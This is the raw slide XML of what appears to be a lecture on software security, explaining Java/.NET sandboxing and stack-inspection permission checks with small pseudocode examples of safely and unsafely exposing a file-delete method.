                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>();  }  </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr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>
                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>}              </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52235" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{308E7198-5031-7C67-2603-B369281592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813" y="6637338"/>
              <a:ext cx="928687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2236" name="Oval Callout 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{076BA32D-B521-2E52-91C6-9C666455E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375" y="5065713"/>
              <a:ext cx="1857375" cy="1285875"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 93375"/>
                <a:gd name="adj2" fmla="val 14347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nl-NL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  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Should the file be deleted ?</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="nl-NL">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52237" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{309972ED-F24A-7379-6C27-0168F7A4E1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468687" y="4114483"/>
              <a:ext cx="1214437" cy="2665731"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
                <a:gd name="T1" fmla="*/ 0 h 4065"/>
                <a:gd name="T2" fmla="*/ 0 w 1229"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
                <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                <a:gd name="T6" fmla="*/ 0 w 1229"/>
                <a:gd name="T7" fmla="*/ 0 h 4065"/>
                <a:gd name="T8" fmla="*/ 1229 w 1229"/>
                <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                  <a:moveTo>
                    <a:pt x="1228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4064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238" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65420A67-7B5B-A491-1901-6DEF525A8BB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754438" y="2565400"/>
              <a:ext cx="2285998" cy="1881245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
                <a:gd name="T1" fmla="*/ 0 h 4065"/>
                <a:gd name="T2" fmla="*/ 0 w 1229"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
                <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                <a:gd name="T6" fmla="*/ 0 w 1229"/>
                <a:gd name="T7" fmla="*/ 0 h 4065"/>
                <a:gd name="T8" fmla="*/ 1229 w 1229"/>
                <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                  <a:moveTo>
                    <a:pt x="1228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4064"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="3672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52239" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0830F1E6-135C-3076-47BB-DC9B9878D7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438" y="5280025"/>
              <a:ext cx="314325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29" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12569C91-C827-A242-C2C4-B9BD140A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1779588"/>
            <a:ext cx="666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230" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD3956AB-EC18-B14C-0DB6-C28FD00A8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1779588"/>
            <a:ext cx="660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E0F1B950-45C1-8A50-B39A-FBDF42211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Complication: method calls</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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0858C-B69D-1B4F-C35C-17EA5928C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dirty="0"/>
              <a:t>There are different possibilities here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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allow action if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>top frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on the stack has permission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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only allow action if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all frames </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on the stack have permission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....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/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Pros? Cons?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. is very dangerous: a class may accidentally expose dangerous functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. is very restrictive: a class may want to, and need to, expose some dangerous functionality, but in a controlled way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More flexible solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stackwalking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aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stack inspection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{661B70E7-90C4-65FF-0340-E7FFA34FD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9C4B3F1F-620B-4F05-910F-54D163586243}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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9432F4DA-C5D1-0B98-5A97-B610A0339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400"/>
              <a:t>Exposing dangerous functionality, (in)securely</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2400"/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29C9D59F-1A32-18D1-7ECA-7FA4BE73FD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138" y="1116013"/>
            <a:ext cx="8855075" cy="5640387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Class Trusted{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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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unsafeMethod</a:t>
            </a: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(File f){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delete f; } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1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// Could be abused by evil caller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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safeMethod</a:t>
            </a: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(File f) {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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" i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....</a:t>
            </a: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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" i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lots of checks on f;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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if all checks are passed, then delete f;}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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1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// Cannot be abused, assuming checks are bullet-proof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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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anotherSafeMethod</a:t>
            </a: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(){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delete ″/tmp/bla″; }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    // Cannot be abused, as filename is fixed.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    //  Assuming this file is not important..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5300" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56EAFE8B-5048-F0CE-40B6-CB9539A9D7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AE2176F-3EF6-4E84-B757-D5DFEF7ED8F1}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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D31B341B-00D0-7999-3916-D8D44D55B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400"/>
              <a:t>Using visibility to control access?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2400"/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E1341DA0-9BF8-ED0C-E976-D322DEED09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138" y="1116013"/>
            <a:ext cx="8855075" cy="5640387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Class Trusted{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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0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private</a:t>
            </a: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void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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unsafeMethod</a:t>
            </a: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(File f){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delete f; } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1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// Could be abused by evil caller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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safeMethod</a:t>
            </a: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(File f) {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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" i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....</a:t>
            </a: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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" i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lots of checks on f;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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if all checks are passed, then delete f;}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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1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// Cannot be abused, assuming checks are bullet-proof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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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anotherSafeMethod</a:t>
            </a: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(){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delete ″/tmp/bla″; }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    // Cannot be abused, as filename is fixed.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    //  Assuming this file is not important..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6324" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2A22FB-54EA-6EAA-E9E2-84047CEA9D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9C982308-0039-4A2C-B527-D655798D40AE}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54277" name="Rounded Rectangular Callout 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0032D4-CAD7-0F87-056C-5301C8435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275" y="884238"/>
            <a:ext cx="3654425" cy="2855912"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48588"/>
              <a:gd name="adj2" fmla="val -19102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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Making the unsafe method private &amp; hence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>invisible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to untrusted code helps, but is error-prone. Some public method may call this private method and indirectly expose access to it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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hence: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stackwalking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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{913102DC-51C9-6C93-54CA-69001DFF4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Stack walking</a:t>
            </a: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E3995ABF-D2DD-AA94-60CC-C856E9257C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0000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="338138" indent="-338138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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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Every resource access or sensitive operation protected by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demandPermission(P)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t> call for an appropriate permission P</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741363" lvl="1" indent="-284163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no access without asking permission!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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The algorithm for granting permission is based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" i="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack inspection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>  aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" i="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack walking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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altLang="nl-NL" i="1">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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 sz="1800"/>
              <a:t>Stack inspection first implemented in Netscape 4.0, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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 sz="1800"/>
              <a:t>then adopted by Internet Explorer, Java, .NET</a:t>
            </a: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81648E15-1FF8-2099-8C78-91E01AE4A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E3D8D79A-38B2-4F30-A74F-CA643120E6B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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0030BFF9-A24F-AD4E-9D0A-A56C14176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01625"/>
            <a:ext cx="9070975" cy="64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Modularisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="32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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>which includes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Compartmentalisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> which includes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Sandboxing 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2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2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5" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{178AAD92-8C5E-82F0-5C80-216FCBF96D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4C624527-2F65-42CA-8411-EA79FC377E67}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F00C3363-4A08-3E78-4E19-5C1FC09F7C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Stack walking: basic concepts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C31E9F5-8420-4359-09CA-1F870C69A0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03688" y="1116013"/>
            <a:ext cx="5257800" cy="5640387"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/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GB" altLang="nl-NL" dirty="0"/>
              <a:t>Suppose thread T tries to access a resource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endParaRPr lang="en-GB" altLang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC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GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basic algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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GB" altLang="nl-NL" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access is allowed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" err="1"/>
              <a:t>iff</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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GB" altLang="nl-NL" i="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> components on the call stack have the right to access the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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GB" altLang="nl-NL" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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GB" altLang="nl-NL" dirty="0"/>
              <a:t>rights of a thread is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" i="1" dirty="0"/>
              <a:t>intersection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>  of rights of all outstanding method calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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endParaRPr lang="en-GB" altLang="nl-NL" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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endParaRPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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endParaRPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0C5F9A8-BCD5-5C69-3E10-D79A4B6C7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3E001C30-9CB9-4720-B700-520FF6648F5D}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1400"/>
          </a:p>
        </p:txBody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2BE9C998-EAD2-5A3E-659D-6DC2D88DB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1871663"/>
            <a:ext cx="1344613" cy="1008062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EB613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60422" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ECE4F0B-E99E-2332-F143-9B0602075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8" y="3006725"/>
            <a:ext cx="1344612" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC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60423" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468892F7-375D-1D5C-999F-D8E3CCDC2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4098925"/>
            <a:ext cx="1344612" cy="1763713"/>
          </a:xfrm>
          <a:prstGeom prst="rect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60424" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CED598A3-AB02-387E-9F04-A4F063D11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5076825"/>
            <a:ext cx="941387" cy="506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2700"/>
              <a:t>C3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60425" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571D29DF-C400-8AC2-29F9-81466AC38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413" y="4349750"/>
            <a:ext cx="941387" cy="506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2700"/>
              <a:t>C2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60426" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D03780-8456-ABEF-2220-123D5C162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3195638"/>
            <a:ext cx="941388" cy="50641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2700"/>
              <a:t>C7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60427" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60837777-3D18-80EE-110B-0E9980F5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2073275"/>
            <a:ext cx="941388" cy="506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2700"/>
              <a:t>C5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60428" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D367C4CA-429E-2212-2DD9-CF87E05C9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5899150"/>
            <a:ext cx="30257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/>
              <a:t>Stack for thread T: </a:t>
            </a:r>
          </a:p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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="EB613D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>called by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C7 </a:t>
            </a:r>
          </a:p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/>
              <a:t>      called by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
